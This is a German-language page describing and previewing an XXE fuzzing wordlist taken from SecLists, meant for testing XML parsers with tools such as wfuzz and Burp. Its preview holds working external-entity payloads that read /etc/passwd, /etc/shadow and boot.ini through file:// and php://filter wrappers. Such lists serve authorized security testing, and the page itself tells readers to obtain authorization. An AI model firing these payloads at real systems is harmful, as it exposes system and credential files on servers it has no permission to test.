XXE Fuzzing
XML-External-Entity-Payloads, einschließlich DOCTYPE-/ENTITY-Deklarationen zur Dateioffenlegung über file://- und php://filter-Wrapper. Zum Testen von XML-Parsern auf XXE.
- Größe
- 4.8 KB
- Kategorie
- Fuzzing
- Quelle
- danielmiessler/SecLists
- Lizenz
- MIT
- Empfohlene Tools
- wfuzzburp
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (4.8 KB) herunter oder kopiere sie über die Schaltflächen oben.
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" > <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> <?xml version="1.0" encoding="ISO-8859-1"?><test></test> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
XML-External-Entity-Payloads, einschließlich DOCTYPE-/ENTITY-Deklarationen zur Dateioffenlegung über file://- und php://filter-Wrapper. Zum Testen von XML-Parsern auf XXE.
Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 4.8 KB und harmoniert gut mit Tools wie wfuzz, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
von ihrer Ursprungsquelle auf GitHub bereitgestellt.
Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.